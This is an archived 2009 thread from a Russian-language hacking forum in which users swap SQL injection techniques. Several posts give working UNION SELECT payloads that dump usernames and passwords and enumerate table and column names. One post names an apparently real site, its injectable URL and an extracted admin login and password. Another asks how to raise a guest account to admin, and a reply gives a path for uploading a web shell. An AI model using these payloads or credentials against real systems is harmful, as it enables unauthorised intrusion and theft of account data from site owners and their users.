ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
28.01.2009, 23:02
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
полный путь куда тебе надо залить шелл
например /server/www/public_html/site/images/shell.php
у каждого сайта свой путь по поводу путей опять же поищи на форумe
|
|
|
28.01.2009, 23:28
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Arigona Поиск по форуму, вот одна из тем:
https://forum.antichat.ru/threadnav34338-1-10.html
В этой теме , несколько страниц назад, велась та=же беседа на 10 листов,
можешь почитать отсюда посты kevmen'а и ответы на них:
https://forum.antichat.ru/threadnav46016-502-10.html
не нужно её повторять, пожалуйста 
|
|
|
|
28.01.2009, 23:34
|
|
Новичок
Регистрация: 26.06.2007
Сообщений: 27
Провел на форуме:
267117
Репутация:
1
|
|
У меня такой вопрос нашел SQL injection подобрал столбцы считал из базы хеши и бручу их. А пока брутяться хотел зайти в админку. (подобрал 1 пароль на пользователя с правами гость). Сформировал запрос http://****_id='99999'%20un ion+UPDA TE%20auth%20SET%20us er _type=admin%20WH ERE%20user_id=2
чтобы обновить пользователя с правами гостя на админа (в базе есть права guest и admin ) и зайти в админку но фиг. Запрос выполняется но ничего в базе не изменяет. Что можно сделать, как изменить права?
Последний раз редактировалось omel; 28.01.2009 в 23:38..
|
|
|
|
29.01.2009, 00:34
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Сообщение от omel
У меня такой вопрос нашел SQL injection подобрал столбцы считал из базы хеши и бручу их. А пока брутяться хотел зайти в админку. (подобрал 1 пароль на пользователя с правами гость). Сформировал запрос http://****_id='99999'%20un ion+UPDA TE%20auth%20SET%20us er _type=admin%20WH ERE%20user_id=2
чтобы обновить пользователя с правами гостя на админа (в базе есть права guest и admin ) и зайти в админку но фиг. Запрос выполняется но ничего в базе не изменяет. Что можно сделать, как изменить права?
Ты от гостя пароль подобрал? В админку гостем заходишь? Что за бред? Сделать тут можно только одно - учить FAQ и учить и учить и учить... Ты где-нибудь видел в факе, чтобы народе через инъекцию делал UNION на SELECT и UPDATE? Этого не возможно сделать!
|
|
|
|
29.01.2009, 02:27
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123
Репутация:
122
|
|
Народ,нужна помощь...думаю даже вам будет интересно...и так:
есть скуль(5 ветка)
Код:
http://www.krimsex.com/details_news.php?id=-112%20union%20select%201,username,3,password,5,6,7,8,9,10,11%20%20FROM%20admin
login : admin
pass : root78
есть админка
Код:
http://www.krimsex.com/admin.php
пароль не подходит. вопрос..почему?
ето не все, то была табла admin,есть ещё табла users
Код:
http://www.krimsex.com/details_news.php?id=-112%20union%20select%201,login,3,password,5,6,7,8,9,10,11%20%20FROM%20users
пробывал лимитом 10 акков,не один не подошол..
вход для юзеров тут:
Код:
http://www.krimsex.com/login.php
Очень большая просьба помочь
Последний раз редактировалось TELO; 29.01.2009 в 02:30..
|
|
|
|
29.01.2009, 02:34
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
http://site.ru/index.php?id=-1+union+select+null,COLUMN_NAME,TABLE_NAME,TABLE_S CHEMA+FROM+INFORMATION_SCHEMA.COLUMNS+where+TABLE_ NAME=(select+TABLE_NAME+FROM+INFORMATION_SCHEMA.TA BLES+limit+1+offset+20)--
Как выбрать отсюда поля определённой таблицы ? Не может же offset быть полем таблицы определённой,ибо там их больше ста =_=.Пусть таблица - offset 36
ЗЫ: postgre_sql()
|
|
|
|
29.01.2009, 02:39
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123
Репутация:
122
|
|
Сообщение от Велемир
http://site.ru/index.php?id=-1+union+select+null,COLUMN_NAME,TABLE_NAME,TABLE_S CHEMA+FROM+INFORMATION_SCHEMA.COLUMNS+where+TABLE_ NAME=(select+TABLE_NAME+FROM+INFORMATION_SCHEMA.TA BLES+limit+1+offset+20)--
Как выбрать отсюда поля определённой таблицы ? Не может же offset быть полем таблицы определённой,ибо там их больше ста =_=.Пусть таблица - offset 36
ЗЫ: postgre_sql()
Вот запрос - выдергивает все таблицы, в которых есть колонка "password"
Код:
UNION+SELECT+group_concat(table_name)+FROM+INFORMATION_SCHEMA.columns+where+column_name=0x70617373776f7264--
так же в хексе можна вставить любое название колонки
|
|
|
|
29.01.2009, 02:50
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Сообщение от Велемир
http://site.ru/index.php?id=-1+union+select+null,COLUMN_NAME,TABLE_NAME,TABLE_S CHEMA+FROM+INFORMATION_SCHEMA.COLUMNS+where+TABLE_ NAME=(select+TABLE_NAME+FROM+INFORMATION_SCHEMA.TA BLES+limit+1+offset+20)--
Как выбрать отсюда поля определённой таблицы ? Не может же offset быть полем таблицы определённой,ибо там их больше ста =_=.Пусть таблица - offset 36
ЗЫ: postgre_sql()
www.site.com/index.php?id=-1+union+select+null,COLUMN_NAME,null,null+from+INF ORMATION_SCHEMA.COLUMNS+where+TABLE_NAME='табл ица'--
offset - это тот же limit в MYSQL.
TELO,
Надо не хексить, а переводить в char..
К тому же, вопрос был совсем другой.
Последний раз редактировалось R1dex; 29.01.2009 в 02:56..
|
|
|
|
29.01.2009, 02:56
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Надо не хексить, а переводить в char..
это почему?
|
|
|
|
29.01.2009, 03:06
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Вроде PostgreSql не поддерживает hex или я ошибаюсь?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
